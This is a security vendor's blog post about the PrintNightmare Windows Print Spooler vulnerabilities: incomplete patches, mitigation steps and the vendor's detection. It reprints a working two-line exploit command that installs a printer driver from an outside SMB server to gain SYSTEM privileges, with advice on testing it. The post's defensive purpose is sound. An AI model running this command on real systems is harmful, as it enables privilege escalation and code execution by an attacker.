PrintNightmare is a set of software vulnerabilities around Windows’ Print Spooler service. It was originally disclosed in July as CVE-2021-34527 – a print spooler remote code execution – and CVE-2021-1675 – a print spooler privilege escalation. They allow an attacker to elevate privileges from a regular user to system privileges remotely over the network (as you can see here). Several patches were made available in July and subsequently bypassed. System owners everywhere scrambled to put mitigations in place. Our products have detection. On Tuesday there was one last round of updates, and all is good. So we thought.

PrintNightmare-image-feature
PrintNightmare-image-feature

PrintNightmare is a set of software vulnerabilities around Windows’ Print Spooler service. It was originally disclosed in July as CVE-2021-34527 – a print spooler remote code execution – and CVE-2021-1675 – a print spooler privilege escalation. They allow an attacker to elevate privileges from a regular user to system privileges remotely over the network (as you can see here). Several patches were made available in July and subsequently bypassed. System owners everywhere scrambled to put mitigations in place. Our products have detection. On Tuesday there was one last round of updates, and all is good. So we thought.

But What Happened!?

August’s patches are not enough to fix the issues. Microsoft released another security advisory for which there is no patch. What is even more confusing is that the advisories given by the US’ CERT-CC and the Canadian Center for Cyber Security (CCCS) talk about the August 10th patches and imply that this is fixed.

PrintNightmare-image-1
Figure 1 – Freshly reproduced vulnerability (post August updates)

Handed on a Silver Platter

Last month there was already a reliable public proof of concept (PoC) exploit circulating, integrated in the reputable mimikatz package. However, to spice things up, Kevin Beaumont released a two liner batch file that exploits the vulnerability by leveraging the exis
ting gentilkiwi’s server already exposed on the Internet. He dubbed it “SystemNightmare”.

PrintNightmare-image-2
Figure 2 – The Silver Platter

Here’s the code:
net use \\printnightmare.gentilkiwi.com\ipc$ /user:gentilguest password rundll32 printui.dll,PrintUIEntry /in /n"\\printnightmare.gentilkiwi.com\Kiwi Legit Printer"

If you tried that PoC in your lab and it didn’t work, remember that many ISPs block outbound TCP 445 which is what the SMB service uses. The above “net use” command will initiate SMB traffic to printnightmare.gentilkiwi.com. However, that is not the case for business-grade Internet connections. Make sure to test the PoC in the adequate environment to determine if you are affected or not by this vulnerability.

We know from experience what happens when a vulnerability gets this easy to exploit: it is quickly leveraged by opportunistic attackers. This is already the case with the Magniber ransomware group using it to attack targets in South Korea.

What Should You Do?

First, make sure you applied July and August monthly updates. Next, make sure you understand properly the risk profile of this vulnerability: the attacker must already have credentials of at least one regular user in the network to perform the local privilege escalation or remote code execution attack successfully.

The first mitigation is to disable the spooler service in Windows, which can be accomplished by executing the following commands in an elevated PowerShell prompt.

Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled

The second mitigation is to disable inbound remote printing through Group Policy. You can also configure the settings via Group Policy as follows: Computer Configuration / Administrative Templates / Printers.

The third mitigation is to make sure that in your Group Policy for “Computer Configuration -> Administrative Templates -> Network -> Lanman Workstation -> Enable insecure guest logons” is disabled. This ensures that the server cannot access guest shares. This will NOT protect against the exploit itself. However, it does prevent exploit attempts that setup a guest share to distribute the malicious DLL.

The fourth mitigation is to segment the network in a way, which does not allow regular users to interact with systems that require the print spooler service.

If you have a large network and need to determine which endpoints are vulnerable you can scan entire subnets for the vulnerability using this tool.

Since this story keeps on giving, I would advise you refer to mimispool’s documentation for additional mitigation.

Protecting our Customers

GoSecure Titan Labs has tested the Proof of Concept (PoC) exploits on a new installation of Windows Server 2019 installation and the exploit was successful. GoSecure Titan Labs have created heuristic signatures to identify suspicious printer driver requests within short succession of each other, which provides the key behavioral indicators to identify exploit attempts.
PrintNightmare-image-3
Figure 3 – PrintNightmare registry key changes detected
PrintNightmare-image-4
Figure 4 – PrintNightmare DLL drop detected
Our vulnerability management as a service (VMaaS) group is monitoring this issue closely and pushing patches as they are made available. They also worked with multiple clients to evaluate the risks and deploy the aforementioned mitigations. In many corporate environments, the features abused by the PrintNightmare set of vulnerabilities can be safely disabled on both servers and endpoints.

Not The Last One

Unfortunately, we predict that these confusing partial patch and exploit cycles with Microsoft are far from over. Their products are complex, and Microsoft has been extremely reluctant on changing default behavior even when the default behavior turns into security issues. We personally experienced that when we dealt with them on the Windows Server Update Services (WSUS) vulnerabilities last year (part 1, part 2). Furthermore, members of the community started maintaining lists of unpatched vulnerabilities from Microsoft. This is for one vendor which does provide reliable and automatic updates. Imagine trying to stay up to date when you have exposed VPN, MFA appliances and all sorts of servers…

Thanks to Ryan Ackroyed, Olivier Bilodeau, Lilly Chalupowski, Katie Horne, Sean Mahoney, Julien Pineault and Griffin Whynacht who were instrumental for the detection of PrintNightmare by our products and the writing of this article.

GoSecure Titan® Managed Extended Detection & Response (MXDR)​

GoSecure Titan® Managed Extended Detection & Response (MXDR)​ Foundation

GoSecure Titan® Vulnerability Management as a Service (VMaaS)

GoSecure Titan® Managed Security Information & Event Monitoring (Managed SIEM)

GoSecure Titan® Managed Perimeter Defense​ (MPD)

GoSecure Titan® Inbox Detection and Response (IDR)

GoSecure Titan® Secure Email Gateway (SEG)

GoSecure Titan® Threat Modeler

GoSecure Titan® Identity

GoSecure Titan® Platform

GoSecure Professional Security Services

Incident Response Services

Security Maturity Assessment

Privacy Services

PCI DSS Services

Penetration Testing Services​

Security Operations

MicrosoftLogo

GoSecure MXDR for Microsoft

Comprehensive visibility and response within your Microsoft security environment

USE CASES

Cyber Risks

Risk-Based Security Measures

Sensitive Data Security

Safeguard sensitive information

Private Equity Firms

Make informed decisions

Cybersecurity Compliance

Fulfill regulatory obligations

Cyber Insurance

A valuable risk management strategy

Ransomware

Combat ransomware with innovative security

Zero-Day Attacks

Halt zero-day exploits with advanced protection

Consolidate, Evolve & Thrive

Get ahead and win the race with the GoSecure Titan® Platform

24/7 MXDR FOUNDATION

GoSecure Titan® Endpoint Detection and Response (EDR)

GoSecure Titan® Next Generation Antivirus (NGAV)

GoSecure Titan® Security Information & Event Monitoring (SIEM)

GoSecure Titan® Inbox Detection and Reponse (IDR)

GoSecure Titan® Intelligence

OUR SOC

Proactive Defense, 24/7

ABOUT GOSECURE

GoSecure is a recognized cybersecurity leader and innovator, pioneering the integration of endpoint, network, and email threat detection into a single Managed Extended Detection and Response (MXDR) service. For over 20 years, GoSecure has been helping customers better understand their security gaps and improve their organizational risk and security maturity through MXDR and Professional Services solutions delivered by one of the most trusted and skilled teams in the industry.

EVENT CALENDAR

LATEST PRESS RELEASE

GOSECURE BLOG

SECURITY ADVISORIES

 24/7 Emergency – (888)-287-5858